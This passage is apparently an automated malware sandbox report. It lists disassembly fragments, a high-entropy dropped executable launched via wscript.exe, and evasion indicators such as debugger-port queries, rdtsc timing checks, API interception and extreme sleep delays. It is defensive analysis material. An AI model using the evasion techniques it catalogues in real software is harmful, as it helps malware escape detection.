                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_0040D791 push ecx; ret 4_2_0040D772
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02BF225F pushad ; ret 4_2_02BF27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02BF1368 push eax; iretd 4_2_02BF1369
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02BFB008 push es; iretd 4_2_02BFB009
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02BF1078 push edi; retn 0002h 4_2_02BF108A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02BF27FA pushad ; ret 4_2_02BF27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02BF283D push eax; iretd 4_2_02BF2858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02C209AD push ecx; mov dword ptr [esp], ecx 4_2_02C209B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02BF9939 push es; iretd 4_2_02BF9940
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 6_2_033709AD push ecx; mov dword ptr [esp], ecx 6_2_033709B6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 6_2_02C05288 push dword ptr [edx]; ret 6_2_02C0528D
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 6_2_02C1A383 push ds; ret 6_2_02C1A384
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 6_2_02C1A35F push cs; retf 6_2_02C1A367
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 6_2_02C1C6FC push 26B21532h; retf 6_2_02C1C701
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 6_2_02C22640 push ss; ret 6_2_02C22647
                Source: p_Cm7afCdw.exe.0.dr Static PE information: section name: .text entropy: 7.982947390430522
                Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe
                Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe API/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe API/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe API/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe API/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe API/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe API/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe API/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe API/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe Memory allocated: 1420000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe Memory allocated: 2DB0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe Memory allocated: 4DB0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02C4BBA0 rdtsc 4_2_02C4BBA0
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Window / User API: threadDelayed 9760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 0.8 %
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe API coverage: 3.2 %
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe TID: 7652 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7848 Thread sleep count: 213 > 30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7848 Thread sleep time: -426000s >= -30000s
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7848 Thread sleep count: 9760 > 30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7848 Thread sleep time: -19520000s >= -30000s
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 6_2_02C1CB30 FindFirstFileW,FindNextFileW,FindClose, 6_2_02C1CB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02C4BBA0 rdtsc 4_2_02C4BBA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00417F53 LdrLoadDll, 4_2_00417F53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02C2A2C3 mov eax, dword ptr fs:[00000030h] 4_2_02C2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02C4B2C0 mov eax, dword ptr fs:[00000030h] 4_2_02C4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02C292C5 mov eax, dword ptr fs:[00000030h] 4_2_02C292C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02C1B2D3 mov eax, dword ptr fs:[00000030h] 4_2_02C1B2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02C4F2D0 mov eax, dword ptr fs:[00000030h] 4_2_02C4F2D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02CD12ED mov eax, dword ptr fs:[00000030h] 4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02C302E1 mov eax, dword ptr fs:[00000030h] 4_2_02C302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02CF52E2 mov eax, dword ptr fs:[00000030h] 4_2_02CF52E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02CDF2F8 mov eax, dword ptr fs:[00000030h] 4_2_02CDF2F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02C192FF mov eax, dword ptr fs:[00000030h] 4_2_02C192FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02C5E284 mov eax, dword ptr fs:[00000030h] 4_2_02C5E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02CA0283 mov eax, dword ptr fs:[00000030h] 4_2_02CA0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02CF5283 mov eax, dword ptr fs:[00000030h] 4_2_02CF5283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02C5329E mov eax, dword ptr fs:[00000030h] 4_2_02C5329E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02C302A0 mov eax, dword ptr fs:[00000030h] 4_2_02C302A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02C352A0 mov eax, dword ptr fs:[00000030h] 4_2_02C352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02CE92A6 mov eax, dword ptr fs:[00000030h] 4_2_02CE92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_02CB72A0 mov eax, dword ptr fs:[00000030h] 4_2_02CB72A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB72A0 mov eax, dword ptr fs:[00000030h]4_2_02CB72A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB62A0 mov eax, dword ptr fs:[00000030h]4_2_02CB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB62A0 mov ecx, dword ptr fs:[00000030h]4_2_02CB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB62A0 mov eax, dword ptr fs:[00000030h]4_2_02CB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB62A0 mov eax, dword ptr fs:[00000030h]4_2_02CB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB62A0 mov eax, dword ptr fs:[00000030h]4_2_02CB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB62A0 mov eax, dword ptr fs:[00000030h]4_2_02CB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA92BC mov eax, dword ptr fs:[00000030h]4_2_02CA92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA92BC mov eax, dword ptr fs:[00000030h]4_2_02CA92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA92BC mov ecx, dword ptr fs:[00000030h]4_2_02CA92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA92BC mov ecx, dword ptr fs:[00000030h]4_2_02CA92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C19240 mov eax, dword ptr fs:[00000030h]4_2_02C19240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C19240 mov eax, dword ptr fs:[00000030h]4_2_02C19240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5724D mov eax, dword ptr fs:[00000030h]4_2_02C5724D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1A250 mov eax, dword ptr fs:[00000030h]4_2_02C1A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDB256 mov eax, dword ptr fs:[00000030h]4_2_02CDB256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDB256 mov eax, dword ptr fs:[00000030h]4_2_02CDB256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C26259 mov eax, dword ptr fs:[00000030h]4_2_02C26259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C24260 mov eax, dword ptr fs:[00000030h]4_2_02C24260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C24260 mov eax, dword ptr fs:[00000030h]4_2_02C24260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C24260 mov eax, dword ptr fs:[00000030h]4_2_02C24260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CED26B mov eax, dword ptr fs:[00000030h]4_2_02CED26B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CED26B mov eax, dword ptr fs:[00000030h]4_2_02CED26B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1826B mov eax, dword ptr fs:[00000030h]4_2_02C1826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C49274 mov eax, dword ptr fs:[00000030h]4_2_02C49274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C61270 mov eax, dword ptr fs:[00000030h]4_2_02C61270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C61270 mov eax, dword ptr fs:[00000030h]4_2_02C61270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C57208 mov eax, dword ptr fs:[00000030h]4_2_02C57208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C57208 mov eax, dword ptr fs:[00000030h]4_2_02C57208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF5227 mov eax, dword ptr fs:[00000030h]4_2_02CF5227
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1823B mov eax, dword ptr fs:[00000030h]4_2_02C1823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDC3CD mov eax, dword ptr fs:[00000030h]4_2_02CDC3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A3C0 mov eax, dword ptr fs:[00000030h]4_2_02C2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A3C0 mov eax, dword ptr fs:[00000030h]4_2_02C2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A3C0 mov eax, dword ptr fs:[00000030h]4_2_02C2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A3C0 mov eax, dword ptr fs:[00000030h]4_2_02C2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A3C0 mov eax, dword ptr fs:[00000030h]4_2_02C2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A3C0 mov eax, dword ptr fs:[00000030h]4_2_02C2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C283C0 mov eax, dword ptr fs:[00000030h]4_2_02C283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C283C0 mov eax, dword ptr fs:[00000030h]4_2_02C283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C283C0 mov eax, dword ptr fs:[00000030h]4_2_02C283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C283C0 mov eax, dword ptr fs:[00000030h]4_2_02C283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDB3D0 mov ecx, dword ptr fs:[00000030h]4_2_02CDB3D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDF3E6 mov eax, dword ptr fs:[00000030h]4_2_02CDF3E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF53FC mov eax, dword ptr fs:[00000030h]4_2_02CF53FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E3F0 mov eax, dword ptr fs:[00000030h]4_2_02C3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E3F0 mov eax, dword ptr fs:[00000030h]4_2_02C3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E3F0 mov eax, dword ptr fs:[00000030h]4_2_02C3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C563FF mov eax, dword ptr fs:[00000030h]4_2_02C563FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1E388 mov eax, dword ptr fs:[00000030h]4_2_02C1E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1E388 mov eax, dword ptr fs:[00000030h]4_2_02C1E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1E388 mov eax, dword ptr fs:[00000030h]4_2_02C1E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4438F mov eax, dword ptr fs:[00000030h]4_2_02C4438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4438F mov eax, dword ptr fs:[00000030h]4_2_02C4438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF539D mov eax, dword ptr fs:[00000030h]4_2_02CF539D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C18397 mov eax, dword ptr fs:[00000030h]4_2_02C18397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C18397 mov eax, dword ptr fs:[00000030h]4_2_02C18397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C18397 mov eax, dword ptr fs:[00000030h]4_2_02C18397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C7739A mov eax, dword ptr fs:[00000030h]4_2_02C7739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C7739A mov eax, dword ptr fs:[00000030h]4_2_02C7739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C433A5 mov eax, dword ptr fs:[00000030h]4_2_02C433A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C533A0 mov eax, dword ptr fs:[00000030h]4_2_02C533A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C533A0 mov eax, dword ptr fs:[00000030h]4_2_02C533A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1D34C mov eax, dword ptr fs:[00000030h]4_2_02C1D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1D34C mov eax, dword ptr fs:[00000030h]4_2_02C1D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF5341 mov eax, dword ptr fs:[00000030h]4_2_02CF5341
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C19353 mov eax, dword ptr fs:[00000030h]4_2_02C19353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C19353 mov eax, dword ptr fs:[00000030h]4_2_02C19353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA035C mov eax, dword ptr fs:[00000030h]4_2_02CA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA035C mov eax, dword ptr fs:[00000030h]4_2_02CA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA035C mov eax, dword ptr fs:[00000030h]4_2_02CA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA035C mov ecx, dword ptr fs:[00000030h]4_2_02CA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA035C mov eax, dword ptr fs:[00000030h]4_2_02CA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA035C mov eax, dword ptr fs:[00000030h]4_2_02CA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEA352 mov eax, dword ptr fs:[00000030h]4_2_02CEA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDF367 mov eax, dword ptr fs:[00000030h]4_2_02CDF367
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CC437C mov eax, dword ptr fs:[00000030h]4_2_02CC437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C27370 mov eax, dword ptr fs:[00000030h]4_2_02C27370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C27370 mov eax, dword ptr fs:[00000030h]4_2_02C27370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C27370 mov eax, dword ptr fs:[00000030h]4_2_02C27370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA930B mov eax, dword ptr fs:[00000030h]4_2_02CA930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA930B mov eax, dword ptr fs:[00000030h]4_2_02CA930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA930B mov eax, dword ptr fs:[00000030h]4_2_02CA930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5A30B mov eax, dword ptr fs:[00000030h]4_2_02C5A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5A30B mov eax, dword ptr fs:[00000030h]4_2_02C5A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5A30B mov eax, dword ptr fs:[00000030h]4_2_02C5A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1C310 mov ecx, dword ptr fs:[00000030h]4_2_02C1C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C40310 mov ecx, dword ptr fs:[00000030h]4_2_02C40310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE132D mov eax, dword ptr fs:[00000030h]4_2_02CE132D
